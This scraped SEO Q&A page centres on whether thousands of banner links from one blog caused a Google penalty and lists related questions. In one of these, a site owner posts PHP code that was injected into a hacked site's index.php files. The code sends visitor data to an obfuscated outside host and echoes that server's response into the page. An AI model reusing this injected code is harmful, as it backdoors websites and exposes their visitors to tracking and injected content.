I have 4012 links from one blog - will Google penalise?
-
My website (http://www.gardenbeet.com) has 4012 links from http://cocomale.com/blog/ to my home page -a banner advert links from the blog -
I also have 3,776 from another website to 6 pages of my website
1,832 from pinterest to 183 pages
etc etc
overall there are 627 domains linking to my website
I have been advised by a SEO company that I was penalised in about may to july 2012 due to a large number of links coming from one domain or two domains
is that true? should I ask the blog owner to remove my link?
-
Sorry for the late reply!
Short answer: yes. That looks like a gradual drop that could be caused by lack of new activity and/or engagement with your site. I'd be surprised if it was link-based.
-
Hi everyone thanks for your feedback.
I will get those links no followed.
There are no manual penalties
I have no paid adverts linking to my site
I believe the drop in traffic is due to my reduction in online activity after June 2012 rather than a Google penalty. Would the graph that i have attached look more dramatic if there was a penalty applied?
-
In addition to what Bill said (excellent advice) I'd also try to
- get those links nofollowed, or ask that they be removed.
- check for manual penalties
- disavow any domain with paid ads linking to your site.
- File a reconsideration request if necessary.
After that, you should be in a good position to re-evaluate.
-
Bill covered all the important points there Felicity.
-Andy
-
My suggestion is to ask the owner to make them a non-follow. Technically for a Banner Ad that is the Google's recommendation.
My thought on seeing if you were penalized. Use webmaster tools to see if you have any manual penalties. If not I would go back to Google Analytics and filter Organic Search and look at the traffic for the last three years if you have the data. If there was an algorithmic penalty you should see a drop off in traffic. If there is I would also look to see if there were other changes made to the site during the period to rule out on page issues.
Got a burning SEO question?
Subscribe to Moz Pro to gain full access to Q&A, answer questions, and ask your own.
Browse Questions
Explore more categories
-
Moz Tools
Chat with the community about the Moz tools.
-
SEO Tactics
Discuss the SEO process with fellow marketers
-
Community
Discuss industry events, jobs, and news!
-
Digital Marketing
Chat about tactics outside of SEO
-
Research & Trends
Dive into research and trends in the search industry.
-
Support
Connect on product support and feature requests.
Related Questions
-
Does google sandbox aged domains too?
Hello, i have a question. Recently i bought a domain from godaddy auction which is 23 years old and have DA 37 PA 34 Before bidding i check out the domain on google using this query to make sure if pages of this website are showing or not (site:mydomain.com) only home page was indexed on google. Further i check the domain on archive web the domain was last active in 2015. And then it parked for long about 4 years. So now my question does google consider these type of domain as new or will sandboxed them if i try to rebuild them and rank for other niche keywords ? Because its been 4 weeks i have been building links to my domain send several profile and social signals to my domain. My post is indexed on google but not showing in any google serp result.
White Hat / Black Hat SEO | | Steven231 -
Regular links may still
Good day: I understand guest articles are a good way to pass linkjuice and some authors have a link to their website on the "Author Bio" section of the article. These links are usually regular links. However, I noticed that some of these sites (using wordpress) have several SEO plugins with the following settings: Nofollow: Tell search engines not to spider links on this webpage. My question is: If the setting above was activated, I would assume the author's website link would look like a regular link but some other code could still be present in the page (ex, header) that would prevent this regular link from being followed. Therefore, the guest writer would not experience any linkjuice. Any idea if there's a way of being able to see if this scenario is happening? What code would we look for?
White Hat / Black Hat SEO | | Audreythenurse0 -
Exact match domain - should i use one
i have the domain "region"familyholidays.co.uk for an upcoming site. i was pleased as its memorable and tells the user what its about. i am targetting keywords such as: region family holidays region family hotels region famliy cottages region family campsites is it something i should avoid because of potential penalties. i will be adding plenty of good content and doing all the offsite things but dont want to start with a handicap with an emd? thanks neil
White Hat / Black Hat SEO | | neilhenderson0 -
Clean-up Question after a wordpress site Hack added pages with external links from a massive link wheel?
Hey All, Thought I would throw this out to ensure I am dotting my "i's" and crossing my "t's"..... Client WordPress site was hacked injected 3-4 pages that cross linked to hundreds (affiliate junk spam link wheel). Pages were removed, 3rd party cleared all malware/viruses. Heavy duty firewall and security monitoring are in place. Hacked pages are now showing as 404. No penalties, ranking issues....If anything there was a temporary BOOST in rankings due to the large link-wheel type net that the pages were receiving....That has since leveled out rankings. I guess my question is, in your opinion is it best to let those pages 404, I am noticing a large amount of links going to them from all over the world from this large link net that was built. I find the temptation to 301 re-direct deleted pages to the homepage difficult...lol..{the temptation is REAL}. Is there anything I am missing? Any other steps that YOU would take? I am assuming letting those pages 404 would be the best bet, as in time they will roll off index.... Thank you in advance, I appreciate any feedback or opinions....
White Hat / Black Hat SEO | | Anthony_Howard0 -
Separating the syndicated content because of Google News
Dear MozPeople, I am just working on rebuilding a structure of the "news" website. For some reasons, we need to keep syndicated content on the site. But at the same time, we would like to apply for google news again (we have been accepted in the past but got kicked out because of the duplicate content). So I am facing the challenge of separating the Original content from Syndicated as requested by google. But I am not sure which one is better: *A) Put all syndicated content into "/syndicated/" and then Disallow /syndicated/ in robots.txt and set NOINDEX meta on every page. **But in this case, I am not sure, what will happen if we will link to these articles from the other parts of the website. We will waste our link juice, right? Also, google will not crawl these pages, so he will not know about no indexing. Is this OK for google and google news? **B) NOINDEX meta on every page. **Google will crawl these pages, but will not show them in the results. We will still loose our link juice from links pointing to these pages, right? So ... is there any difference? And we should try to put "nofollow" attribute to all the links pointing to the syndicated pages, right? Is there anything else important? This is the first time I am making this kind of "hack" so I am exactly sure what to do and how to proceed. Thank you!
White Hat / Black Hat SEO | | Lukas_TheCurious1 -
Website has been hacked will this hurt ranking
Today we found out that a website of as has been hacked and that they put this code in multiple index.php files: if (!isset($sRetry))
White Hat / Black Hat SEO | | GTGshops
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 8);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?> After some search I found other people mentioning this problem too.They were also talking about that this could have impact on your search rankings. My first question : Will this hurt my rankings ? Second question: Is there something I can do to tell the search engines about the hack so that we don't lose ranking on this. Grtz, Ard0 -
Penalized In Google ?
Hello Guy´s. Im terrible sad because we make an amazing SEO job for this client: www.medabcn.com And the website was hacked.. Message from the hosting platform: "It would appear that malicious individuals have found a way to upload spam
White Hat / Black Hat SEO | | maty
pages as well as backdoors to your site(s). We
have disabled the page(s) in question (via removing their permissions, e.g..
chmod) until you are able to address this matter." Result: we loose all our SERP Somebody of yours was in a similar situation ? Notes: I was on Google Webmaster an anything seem to be normal. The domain was relative new, maybe a late sandbox efect ? Thanks a lot for your help. Matias0 -
Ditching of spammy links - will it be of benefit?
Hi there. We have recently taken over the SEO for a five-star hotel who rank very well already for a lot of their main terms, largely down to the fact they have decent off-site strength (as yet very little on-page optimisation has been done, so they aren't appearing for some quite key terms). This off-page strength includes around 2000 links, giving the home page an authority of 63 in the OSE tool. However, upon looking at the links to check they were pointing to the most relevant page etc, I notice they have A LOT of spammy links, pointing to their site with anchor text like 'cheap cialis' or 'buy valium'. Clearly these aren't the kinds of links that should be pointing to a five-star hotel, but should I expect to see much of a drop by attempting to remove these links? We obviously want to clean their link portfolio up, but I'm not sure they would be too happy if all their top rankings disappeared - even if only temporarily, and even if done with the best intentions. I ask as none of the other sites we handle SEO for have had such a proliferation of these links, so I've not seen the ramifications in full. Any help would be much appreciated, along with advice on the best way to remove these links.
White Hat / Black Hat SEO | | themegroup0